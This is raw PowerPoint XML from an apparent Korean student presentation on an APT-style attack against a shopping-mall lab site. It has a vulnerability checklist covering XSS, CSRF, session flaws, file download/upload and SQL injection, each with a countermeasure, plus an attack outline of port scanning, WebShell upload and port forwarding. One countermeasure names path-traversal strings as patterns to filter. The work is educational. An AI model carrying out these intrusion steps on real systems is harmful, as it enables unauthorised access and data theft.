                </a:gridCol>
                <a:gridCol w="2965024">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3561460585"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="420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구분</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="9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진단 항목</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="9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900" b="1" dirty="0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보안 방안</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="9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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1694983011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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b="1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lang="ko-KR" sz="900" b="1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초기 비밀번호 설정</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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초기 비밀번호 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" sz="1000" b="1" dirty="0" err="1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미변경</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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변경 요망</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="241545386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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900" b="1" dirty="0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9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altLang="ko-KR" sz="1000" b="1" dirty="0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XSS</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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ko-KR" sz="1000" b="1" dirty="0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HTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="ko-KR" sz="1000" b="1" dirty="0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태그 사용 금지 또는 화이트리스트 생성</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1000" b="1" dirty="0" smtClean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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1856303812"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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b="1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lang="ko-KR" sz="900" b="1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altLang="ko-KR" sz="1000" b="1" dirty="0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CSRF</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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ko-KR" sz="1000" b="1" dirty="0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HTML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="ko-KR" sz="1000" b="1" dirty="0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태그 사용 금지 또는 화이트리스트 생성</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58617" marR="58617" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1166842786"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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b="1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endParaRPr lang="ko-KR" sz="900" b="1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000" b="1" dirty="0" err="1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세션관리</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0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 취약점</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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접근권한 확인</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1795755773"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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b="1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</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="900" b="1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000" b="1" dirty="0" err="1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민감데이터</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0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 노출</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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000" b="1" dirty="0" err="1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민감정보를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1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 보호하기 위해 계획한 위협을 고려해서 현재 사용하지 않거나 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0" err="1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전송중인</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1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 모든 민감한 정보를 위협으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0" err="1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부터</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1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 보호할 수 있는 방법으로 암호화해야 합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" smtClean="0"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  <a:endParaRPr lang="ko-KR" sz="10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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="445915936"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="47490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b="1" dirty="0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6</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="9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보안설정오류</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" smtClean="0"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‘../’, ‘../../’, ‘..//..//’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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등 다양한 패턴을 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" sz="1000" b="1" dirty="0" err="1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필터링</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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시킨다</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="410426231"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="47490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9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ko-KR" sz="9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파일 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" sz="1000" b="1" dirty="0" err="1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저장시</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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자동으로 이름을 암호화 하여 저장</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="432789406"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7815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b="1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8</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="900" b="1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000" b="1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SQL Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="1000" b="1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기본적인 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" sz="1000" b="1" dirty="0" err="1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인증우회</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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lang="en-GB" sz="1000" b="1" dirty="0" err="1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ErrorBase</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" sz="1000" b="1" dirty="0" err="1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구문방어가</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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되어있지만</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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Blind SQL Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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툴을 이용하여 모든 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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DB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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내용 파악 가능합니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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 SQL Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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은 완벽한 방어가 없기 때문에 중요 정보는 암호화로 저장을 권장</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1587102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716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57833" y="980728"/>
            <a:ext cx="6566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처음 받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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주소를 통해 쇼핑몰을 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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16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차 서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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차 서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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쇼핑몰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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를 찾은 후 취약점 진단 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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분석 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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6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287982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b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>시나리오</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="직사각형 19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808" y="2492896"/>
            <a:ext cx="44342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제공받은 공인 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IP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주소를 통해 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차 서버 포트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스캔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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600" b="1" dirty="0" err="1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WebShell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업로드 시도 및 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차 서버 탐색</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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차 서버 접속 후 포트 스캔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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포트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0" err="1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포워딩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endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1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해당 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사이트내 취약점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탐색</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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400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31690" y="938818"/>
            <a:ext cx="1504006" cy="603494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1800" spc="-50" dirty="0" smtClean="0"/>
              <a:t>CHECK LIST</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-5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892316"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2555776" y="1412776"/>
          <a:ext cx="5128412" cy="45259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9466">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2187547275"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1363922">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3414310476"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2965024">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3561460585"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="420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구분</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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진단 항목</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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진단 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0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항목 설명</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1694983011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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b="1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lang="ko-KR" sz="1000" b="1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초기 비밀번호 설정</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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SQL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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서버 초기 비밀번호 변경 확인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545386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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000" b="1" dirty="0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altLang="ko-KR" sz="1000" b="1" dirty="0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XSS</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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b="1" dirty="0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스크립트로 이용한 공격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6303812"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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lang="ko-KR" sz="10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altLang="ko-KR" sz="1000" b="1" dirty="0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CSRF</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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스크립트로 이용한 공격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6842786"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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endParaRPr lang="ko-KR" sz="10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000" b="1" dirty="0" err="1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세션관리</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0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 취약점</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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000" b="1" dirty="0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URL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0" err="1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점핑을</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0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 통한 공격</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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5755773"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="474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b="1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</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="1000" b="1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000" b="1" dirty="0" err="1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민감데이터</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" dirty="0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 노출</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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쿠키 변조 및 도움을 통한 타 사용자 위장 공격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5915936"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="47490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b="1" dirty="0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6</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="10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보안설정오류</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0" smtClean="0"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파일을 다운로드하여 시스템을 공격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426231"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="47490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9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ko-KR" sz="900" b="1" dirty="0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파일을 업로드하여 시스템을 공격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2789406"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7815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b="1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8</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="1000" b="1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000" b="1"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SQL Injection</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="1000" b="1">
                        <a:effectLst/>
                        <a:latin typeface="나눔고딕" panose="020B0600000101010101" charset="-127"/>
                        <a:ea typeface="나눔고딕" panose="020B0600000101010101" charset="-127"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="58617" marR="5861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SQL </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" sz="1000" b="1" dirty="0" err="1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쿼리문을</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR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 입력하여 로그인 우회 및 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB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DB</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" sz="1000" b="1" dirty="0"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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <a:t>열람을 하는 공격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7102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253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본론</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng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쇼핑몰 </a:t>
            </a:r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APT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격과 취약점 분석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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" b="0" spc="-90" dirty="0" smtClean="0"/>
              <a:t>서버 탐색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572331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57833" y="980728"/>
            <a:ext cx="6566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처음 받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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주소를 통해 쇼핑몰을 찾는다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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16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차 서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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차 서버</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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쇼핑몰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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를 찾은 후 취약점 진단 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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16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분석 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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6" name="제목 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331690" y="620688"/>
            <a:ext cx="1287982" cy="603494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1800" b="1" spc="-50" dirty="0" smtClean="0"/>
              <a:t>서버 탐색</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" b="1" spc="-50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="직사각형 19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426766" y="1988840"/>
            <a:ext cx="3929697" cy="4757002"/>
            <a:chOff x="2426766" y="1988840"/>
            <a:chExt cx="3929697" cy="47570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92" r="26097" b="11072"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2426766" y="1988840"/>
              <a:ext cx="3929697" cy="4757002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131840" y="2060848"/>
              <a:ext cx="1566284" cy="17785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ffectLst>
              <a:outerShdw blurRad="101600" dist="76200" algn="t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14982" y="6568727"/>
              <a:ext cx="1737138" cy="1771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ffectLst>
              <a:outerShdw blurRad="101600" dist="76200" algn="t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959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5778</TotalTime>
  <Words>1435</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>443</Paragraphs>
  <Slides>59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7" baseType="lpstr">
      <vt:lpstr>Aharoni</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>나눔명조 ExtraBold</vt:lpstr>
      <vt:lpstr>나눔고딕</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>나눔고딕 ExtraBold</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>쇼핑몰 APT 공격과 취약점 분석</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>APT 개요</vt:lpstr>
      <vt:lpstr>APT란?</vt:lpstr>
      <vt:lpstr>시나리오</vt:lpstr>
      <vt:lpstr>시나리오</vt:lpstr>
      <vt:lpstr>CHECK LIST</vt:lpstr>
      <vt:lpstr>1. 서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>서버 탐색</vt:lpstr>
      <vt:lpstr>2. 관리자 계정 획득</vt:lpstr>
      <vt:lpstr>관리자 권한 획득</vt:lpstr>
      <vt:lpstr>관리자 권한 획득</vt:lpstr>
      <vt:lpstr>관리자 권한 획득</vt:lpstr>
      <vt:lpstr>관리자 권한 획득</vt:lpstr>
      <vt:lpstr>관리자 권한 획득</vt:lpstr>
      <vt:lpstr>관리자 권한 획득</vt:lpstr>
      <vt:lpstr>관리자 권한 획득</vt:lpstr>
      <vt:lpstr>3. XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>XSS</vt:lpstr>
      <vt:lpstr>4. CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>5. 세션관리 취약점</vt:lpstr>
      <vt:lpstr>세션관리 취약점</vt:lpstr>
      <vt:lpstr>세션관리 취약점</vt:lpstr>
      <vt:lpstr>세션관리 취약점</vt:lpstr>
      <vt:lpstr>세션관리 취약점</vt:lpstr>
      <vt:lpstr>세션관리 취약점</vt:lpstr>
      <vt:lpstr>세션관리 취약점</vt:lpstr>
      <vt:lpstr>6. 파일 업로드 / 다운로드</vt:lpstr>
      <vt:lpstr>File Download 취약점</vt:lpstr>
      <vt:lpstr>File Download 취약점</vt:lpstr>
      <vt:lpstr>File Download 취약점</vt:lpstr>
      <vt:lpstr>File Download 취약점</vt:lpstr>
      <vt:lpstr>File Download 취약점</vt:lpstr>
      <vt:lpstr>7. SQL 인젝션</vt:lpstr>
      <vt:lpstr>SQL 인젝션</vt:lpstr>
      <vt:lpstr>SQL 인젝션</vt:lpstr>
      <vt:lpstr>SQL 인젝션</vt:lpstr>
      <vt:lpstr>결론</vt:lpstr>
      <vt:lpstr>결론</vt:lpstr>
      <vt:lpstr>Check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student</cp:lastModifiedBy>
  <cp:revision>51</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-08-23T09:45:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-22T06:13:53Z</dcterms:modified>
</cp:coreProperties>
</file>